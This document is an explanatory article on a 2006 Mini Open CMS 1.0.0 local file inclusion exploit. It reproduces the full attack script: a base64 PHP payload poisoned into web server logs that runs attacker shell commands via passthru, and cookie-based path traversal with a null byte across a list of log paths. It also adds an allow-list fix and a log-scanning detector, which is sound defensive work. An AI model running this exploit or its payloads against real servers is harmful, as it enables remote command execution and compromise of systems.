Understanding Local File Inclusion: The miniCWB 1.0.0 Exploit

What this paper is
This paper details a Local File Inclusion (LFI) vulnerability in version 1.0.0 of the Mini Open CMS web application. The exploit, written by Kacper (a.k.a Rahim) and published by DEVIL TEAM, leverages this vulnerability to execute arbitrary commands on the server. The core of the exploit involves manipulating the contact.php script to include and display the contents of sensitive files, such as log files, which can then be used to inject and execute commands.
Simple technical breakdown
The vulnerability lies in how the contact.php script handles user-supplied input for language selection. Specifically, it uses a variable $NEWLANG which is derived from a session variable $session_lang. This $session_lang variable is supposed to be set based on a configuration file or a session. However, if register_globals is enabled on the server, an attacker can directly control $session_lang via HTTP request parameters.
The script then uses this $NEWLANG variable in an include_once statement: include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php");. By providing a path traversal sequence (like ../) followed by a log file path, an attacker can trick the server into including and displaying the content of that log file.
The exploit script first attempts to inject a PHP payload into a web server's log file. This payload is designed to execute a command provided by the attacker. It then crafts a request to contact.php with a manipulated session_lang cookie, pointing to the log file path. If successful, the contact.php script will include the log file, thereby executing the injected PHP code and running the attacker's command.
Complete code and payload walkthrough
The provided PHP script is a command-line tool designed to exploit the LFI vulnerability. Let's break down its components:
ASCII Art and Header Information
```php
<?
print '
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ :+: :+:
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ :+: +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
- - [DEVIL TEAM THE BEST POLISH TEAM] - -
[Exploit name: Mini Open CMS <= 1.0.0 Local File Include Exploit
[Script name: Mini Open CMS v.1.0.0
[Script site: http://www.mini-open-cms.com/
Find by: Kacper (a.k.a Rahim)
========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========
Contact: kacper1964@yahoo.pl
(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon
TomZen, Gelo, Ramzes, DMX, Ci2u, Larry, @steriod, Drzewko, CrazzyIwan, Rammstein
Adam., Kicaj., DeathSpeed, Arkadius, Michas, pepi, nukedclx, SkD, MXZ, sysios,
mIvus, nukedclx, SkD, wacky, xoron,
and
TamTurk,
hackersecurity.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';
```

This section is purely informational. It prints ASCII art, the exploit's name, the affected version, the author's contact information, and greetings to various individuals and groups. It performs no technical function.
Vulnerability Context and Code Snippet
```php
/*
works with register_globals=On
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
in contact.php on line 14-34:
....
header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
session_start();
//session_regenerate_id();
include_once("./config.inc.php");
if (!isset($_SESSION['session_lang'])) // <-------{1}
{
$session_lang = $LANG;
$_SESSION['session_lang']=$session_lang; // <-------{2}
}
else
$session_lang=$_SESSION['session_lang'];// end if
include_once(INDEX_PATH."cls_fast_template.php");
$NEWLANG = $session_lang; // <-------{3}
include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php"); // <-------{4}
include_once(INCLUDE_PATH."cls_string.php");
include_once(INCLUDE_PATH."cls_universal_mailsender.php");
include_once(INCLUDE_PATH."cls_miniFile.php");
include_once(INCLUDE_PATH."cls_pages.php");
include_once(INCLUDE_ADMIN_PATH."cls_arrays.php");
....
*/
```

This commented-out section provides crucial context. It states that the exploit relies on register_globals=On, and it quotes lines 14-34 of contact.php, where:

- session_start() is called.
- A session variable $_SESSION['session_lang'] is managed ({1}, {2}): if it is not set, it defaults to $LANG from the configuration file.
- The $session_lang variable is copied into $NEWLANG ({3}).
- Finally, include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php"); ({4}) is executed. This is the vulnerable line: if $NEWLANG can be controlled by the attacker and contains path traversal characters, it leads to LFI.
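The fix for the pattern at {3}/{4} is to never build the include path from the untrusted value. The following PHP is an added example written for this article, not Mini Open CMS code: it resolves the requested language against a fixed allow-list and confines the resulting path with realpath(), so traversal sequences and the null-byte truncation trick this exploit relies on in its second stage are rejected before include_once ever runs. The language codes, the temporary language directory, and the probe values are constructed for the demo.

```php
<?php
// Added example (not Mini Open CMS code): allow-listed language selection for
// a contact.php-style include. Assumptions: language files live in $langDir
// and are named <code>.inc.php; the set of valid codes is known in advance.

declare(strict_types=1);

const ALLOWED_LANGS = ['en', 'pl', 'de'];   // constructed allow-list

/**
 * Map an untrusted language value (cookie, session, request parameter) to a
 * file inside $langDir, or return null if it is not an allow-listed code.
 * The untrusted string itself is never concatenated into the include path.
 */
function resolve_language_file(string $requested, string $langDir): ?string
{
    // 1. Exact match against the allow-list (strict comparison, no casting).
    //    Anything with "../", a NUL byte or a different case fails here.
    if (!in_array($requested, ALLOWED_LANGS, true)) {
        return null;
    }
    // 2. Build the path from the allow-listed value, then confine it with
    //    realpath() so a misconfigured $langDir cannot escape either.
    $base = realpath($langDir);
    $file = realpath($langDir . DIRECTORY_SEPARATOR . $requested . '.inc.php');
    if ($base === false || $file === false) {
        return null;                       // directory or language file missing
    }
    if (strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                       // resolved outside the language dir
    }
    return $file;
}

// Self-contained demo against a temporary language directory (constructed).
$langDir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
mkdir($langDir);
file_put_contents($langDir . '/en.inc.php', "<?php \$LANG_NAME = 'English';\n");

$probes = [
    'en',                                            // valid
    'pl',                                            // allow-listed, but no file
    "../../../../../var/log/httpd/access_log\0",     // traversal + NUL byte
    '../../etc/passwd',                              // plain traversal
    'EN',                                            // case must match exactly
];
foreach ($probes as $value) {
    $result = resolve_language_file($value, $langDir);
    printf("%-48s => %s\n", json_encode($value), $result ?? 'REJECTED');
}

// The only path that ever reaches include_once is an allow-listed, confined one.
$file = resolve_language_file('en', $langDir);
if ($file !== null) {
    include_once $file;
    echo "loaded language pack: {$LANG_NAME}\n";
}

unlink($langDir . '/en.inc.php');
rmdir($langDir);
```

The order of the two checks matters: the allow-list runs first, so a value containing a NUL byte never reaches realpath() (which rejects such strings with an error on current PHP), and the realpath() confinement is defence in depth against a bad INCLUDE_LANGUAGE_PATH rather than the primary control.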
Command-Line Argument Parsing
```php
if ($argc<4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: Mini_Open path
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 2.2.2.2 /Mini_Open/ ls -la -P1.1.1.1:80
php '.$argv[0].' 1.1.1.1 / ls -la
-----------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
```

- if ($argc<4): checks that the script received at least 4 arguments (script name, host, path, and at least one command part). If not, it prints usage instructions and exits.
- error_reporting(0);: suppresses PHP error messages.
- ini_set("max_execution_time",0);: removes the execution time limit.
- ini_set("default_socket_timeout",5);: sets a default timeout of 5 seconds for socket operations.
sendpacket Function
```php
function sendpacket($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
```

This function sends one raw HTTP request and stores the response in the global $html.

- It takes a $packet string as input and uses the global variables $proxy, $host, $port, $html, and $proxy_regex.
- If no proxy is specified ($proxy == ''), it opens a socket to the target $host on the specified $port with fsockopen. If the connection fails, it prints an error and exits.
- If a proxy is specified, it validates the proxy format against $proxy_regex and then connects to the proxy server. If either step fails, it prints an error and exits.
- It sends the $packet to the server or proxy with fputs.
- It reads the response: without a proxy, line by line with fgets until the end of the stream; with a proxy, byte by byte with fread, continuing until the stream has ended and a double CRLF (\r\n\r\n, the end of the HTTP headers) has been seen in $html.
- It closes the socket connection.
quick_dump Function
```php
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
```

This function takes a string and formats it for display, producing its hexadecimal representation followed by its printable ASCII characters (non-printable bytes are shown as "."), 15 bytes per line. It is a debugging utility for inspecting raw data; the exploit flow never calls it.
Global Variable Initialization and Argument Processing
```php
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
```

- $proxy_regex: a regular expression that validates proxy addresses in IP:port form.
- make_seed(): a function that generates a seed for random number generation. It is defined but not used by this exploit's logic.
- $host, $path: populated from the first two command-line arguments.
- $cmd: the shell command to execute, built from the remaining arguments.
- The loop for ($i=3; $i<$argc; $i++) processes the remaining arguments. It looks at the first two characters of each one: a -p option sets $port, a -P option sets $proxy, and any other argument is appended to the $cmd string.
- $p: the base path for requests. If a proxy is used, it is prefixed with http://host:port so the proxy receives an absolute URL; otherwise it is just the provided $path.
Stage 1: Injecting Payload into Log Files
```php
echo "insert evil code in logfiles ...\r\n\r\n";
$hauru = base64_decode("PD9waHAgb2JfY2xlYW4oKTsvL1J1Y2hvbXkgemFtZWsgSGF1cnUgOy0pZWNobyIuL".
"i5IYWNrZXIuLkthY3Blci4uTWFkZS4uaW4uLlBvbGFuZCEhLi4uREVWSUwuVEVBTS".
"4udGhlLi5iZXN0Li5wb2xpc2guLnRlYW0uLkdyZWV0ei4uLiI7ZWNobyIuLi5HbyB".
"UbyBERVZJTCBURUFNIElSQzogNzIuMjAuMTguNjo2NjY3ICNkZXZpbHRlYW0iO2Vj".
"aG8iLi4uREVWSUwgVEVBTSBTSVRFOiBodHRwOi8vd3d3LnJhaGltLndlYmQucGwvI".
"jtpbmlfc2V0KCJtYXhfZXhlY3V0aW9uX3RpbWUiLDApO2VjaG8gIkhhdXJ1IjtwYX".
"NzdGhydSgkX1NFUlZFUltIVFRQX0hBVVJVXSk7ZGllOz8+");
$packet="GET ".$p.$hauru." HTTP/1.0\r\n";
$packet.="User-Agent: ".$hauru." Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacket($packet);
sleep(3);
```

- echo "insert evil code in logfiles ...\r\n\r\n";: informs the user about the next step.
- $hauru = base64_decode(...): the core of the payload injection. The Base64 string decodes to the following single line of PHP:

```php
<?php ob_clean();//Ruchomy zamek Hauru ;-)echo"..Hacker..Kacper..Made..in..Poland!!...DEVIL.TEAM..the..best..polish..team..Greetz...";echo"..Go To DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam";echo"...DEVIL TEAM SITE: http://www.rahim.webd.pl/";ini_set("max_execution_time",0);echo "Hauru";passthru($_SERVER[HTTP_HAURU]);die;?>
```

  Read statement by statement, this injected code does the following:
  - ob_clean(): clears any output buffer.
  - The three echo calls print greetings and DEVIL TEAM contact information.
  - ini_set("max_execution_time",0);: ensures the command execution does not time out.
  - echo "Hauru";: prints the marker string "Hauru". The next stage looks for this marker to detect whether the injection succeeded.
  - passthru($_SERVER[HTTP_HAURU]);: the command execution. It takes the value of the HAURU HTTP header (supplied by the attacker in the next request) and runs it as a shell command.
  - die;: exits the script after execution.

  One detail of the decoded string is worth noting: it contains no newline, and a PHP // comment runs to the end of the line or to the next ?>, whichever comes first, so as decoded here everything between //Ruchomy and the closing ?> sits inside that comment.
- $packet: constructs an HTTP GET request. The crucial part is that $hauru (the decoded PHP payload) is appended directly to the path, so the request asks for a URL like /path/<?php ob_clean(); ... die;?>. This is a common technique for getting PHP code into web server logs when the server records the requested URL: the server may log the whole string as a request, and if that log file is later included by a vulnerable script, the PHP code inside the logged request is executed.
- User-Agent: ".$hauru." Googlebot/2.1\r\n": the User-Agent header carries the payload as well, a second attempt to get the code logged.
- Host: ".$host."\r\n": specifies the target host.
- Connection: close\r\n\r\n: standard HTTP headers.
- sendpacket($packet);: sends this crafted request.
- sleep(3);: pauses for 3 seconds, presumably to give the web server time to write the request to its log.
Stage 2: Exploiting LFI to Execute Commands
```php
$paths= array (
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);
for ($i=0; $i<=count($paths)-1; $i++)
{
$a=$i+2;
echo "[".$a."] Check Path: ".$paths[$i]."\r\n";
echo "remote code execution...wait..\n";
$packet ="GET ".$p."contact.php HTTP/1.1\r\n";
$packet.="Cookie: session_lang=../".$paths[$i]."%00;\r\n";
$packet.="HAURU: ".$cmd."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacket($packet);
if (strstr($html,"Hauru"))
{
$temp=explode("Hauru",$html);
die($temp[1]);
}
}
echo "Exploit err0r :(\r\n";
echo "Go to DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam\r\n";
?>
```

- $paths: an array of common log file locations across different server configurations. These are the path traversal targets.
- The for loop iterates over each entry of the $paths array.
- $a=$i+2;: a simple counter for display purposes, starting from 2 (since the first two arguments are host and path).
- echo "[".$a."] Check Path: ".$paths[$i]."\r\n";: displays the path being checked.
- echo "remote code execution...wait..\n";: indicates the attempt to execute code.
- $packet: the request that triggers the LFI:
  - GET ".$p."contact.php HTTP/1.1\r\n: targets the contact.php script.
  - Cookie: session_lang=../".$paths[$i]."%00;\r\n: the exploit payload. session_lang= attempts to set the session_lang variable; ../ followed by the current entry of $paths is the traversal that walks up the directory tree to the log file; %00 is a null byte. In older PHP versions (before 5.3.0), a null byte truncated the string handed to the filesystem layer, so the .inc.php suffix appended by include_once was dropped and the log file itself was included. The semicolon terminates the cookie value.
  - HAURU: ".$cmd."\r\n: carries the shell command ($cmd) that the attacker wants to execute. The injected PHP code reads it from $_SERVER[HTTP_HAURU].
  - Host and Connection: Close: standard headers.
- sendpacket($packet);: sends the crafted request.
- if (strstr($html,"Hauru")): checks whether the response ($html) contains the "Hauru" marker string, which indicates that the injected PHP code was executed. If it does, the response is split at "Hauru" and die($temp[1]) prints the part after the marker, which should be the output of the executed command.
- If the loop finishes without finding "Hauru" in any response, the script prints "Exploit err0r :(" and IRC contact information.
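From the defender's side, the two stages above leave distinct traces: stage 1 writes PHP tags into the request line and User-Agent of the access log, while stage 2 sends a Cookie whose value contains ../ and %00, which the default combined log format does not record at all. The following PHP scanner is an added example, not part of the exploit or of the CMS. It assumes Apache combined-format lines, optionally followed by a quoted %{Cookie}i field that an administrator has added to the LogFormat; the three sample lines are constructed for the demo and are not real log data.

```php
<?php
// Added example (not part of the original exploit or of Mini Open CMS): scan
// web-server log lines for the traces of log poisoning and of the cookie-based
// include attempt. Assumptions: Apache "combined" format, optionally followed
// by a quoted Cookie field; the sample lines below are constructed.

declare(strict_types=1);

const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"(?: "([^"]*)")?$/';

/** Indicator regexes checked against every logged field, keyed by label. */
const INDICATORS = [
    'php_open_tag'   => '/<\?(?:php\b|=)/i',
    'exec_function'  => '/\b(?:passthru|system|shell_exec|exec|popen)\s*\(/i',
    'path_traversal' => '#(?:\.\./){2,}#',
    'null_byte'      => '/%00|\x00/',
];

/** Parse one combined-format line into named fields, or null if it does not match. */
function parse_log_line(string $line): ?array
{
    if (!preg_match(LOG_RE, rtrim($line), $m)) {
        return null;
    }
    return [
        'client'  => $m[1],
        'time'    => $m[2],
        'request' => $m[3],
        'status'  => (int) $m[4],
        'referer' => $m[5],
        'agent'   => $m[6],
        'cookie'  => $m[7] ?? '',      // only present if the LogFormat logs cookies
    ];
}

/** Return [field => [indicator, ...]] for every suspicious field of a parsed line. */
function find_indicators(array $entry): array
{
    $hits = [];
    foreach (['request', 'referer', 'agent', 'cookie'] as $field) {
        if ($entry[$field] === '') {
            continue;
        }
        foreach (INDICATORS as $name => $re) {
            if (preg_match($re, $entry[$field])) {
                $hits[$field][] = $name;
            }
        }
    }
    return $hits;
}

/** Scan many lines; returns one finding per suspicious line. */
function scan_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $n => $line) {
        $entry = parse_log_line($line);
        if ($entry === null) {
            continue;                  // not combined format; a real tool would count these
        }
        $hits = find_indicators($entry);
        if ($hits !== []) {
            $findings[] = ['line' => $n + 1, 'client' => $entry['client'],
                           'status' => $entry['status'], 'hits' => $hits];
        }
    }
    return $findings;
}

// Constructed sample: a normal crawler hit, a log-poisoning attempt carrying PHP
// in the User-Agent, and an include attempt whose traversal sits in the Cookie field.
$sample = [
    '192.0.2.10 - - [17/Nov/2006:10:00:01 +0100] "GET /Mini_Open/index.php HTTP/1.1" 200 5120 "-" "Googlebot/2.1"',
    '198.51.100.7 - - [17/Nov/2006:10:00:05 +0100] "GET /Mini_Open/ HTTP/1.0" 200 5120 "-" "<?php passthru($_SERVER[HTTP_HAURU]);die;?> Googlebot/2.1"',
    '198.51.100.7 - - [17/Nov/2006:10:00:09 +0100] "GET /Mini_Open/contact.php HTTP/1.1" 200 812 "-" "Mozilla/5.0" "session_lang=../../../../../../var/log/httpd/access_log%00"',
];

foreach (scan_log($sample) as $f) {
    printf("line %d from %s (HTTP %d):\n", $f['line'], $f['client'], $f['status']);
    foreach ($f['hits'] as $field => $names) {
        printf("  %-8s %s\n", $field, implode(', ', $names));
    }
}
```

Two points follow from the sample. The second line is flagged on the User-Agent alone, which is why a poisoning attempt is visible even when the request line is mangled by the spaces in the injected code. The third line is flagged only because the Cookie header was logged; with the stock combined format it would look like an ordinary contact.php hit, so on a server where this class of bug is a concern the Cookie field (or a web application firewall that inspects it) is what makes stage 2 observable.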
Mapping list: code fragment/block -> practical purpose

| Code fragment/block | Practical purpose |
| --- | --- |
| print '...' banner | Informational: ASCII art, exploit name, affected version, author contact, greetings |
| /* ... */ comment quoting contact.php lines 14-34 | Documents the precondition (register_globals=On) and the vulnerable include_once at {4} |
| if ($argc<4) ... ini_set(...) | Argument count check, usage text, error suppression, unlimited execution time, 5-second socket timeout |
| sendpacket() | Opens a socket (direct or via proxy), sends the raw HTTP request, stores the response in $html |
| quick_dump() | Hex/ASCII dump utility for raw data; not used by the exploit flow |
| $proxy_regex, make_seed(), argument loop, $p | Proxy address validation, unused seed helper, parsing of host/path/cmd and the -p/-P options, base request path |
| $hauru, first $packet, sleep(3) | Stage 1: places the PHP payload in the request path and User-Agent so that the server writes it to its log |
| $paths array and for loop | Stage 2: for each candidate log path, sends the session_lang cookie with traversal and %00 plus the HAURU command header, and prints the response after the "Hauru" marker |
Original exploit published on milw0rm.com [2006-11-17].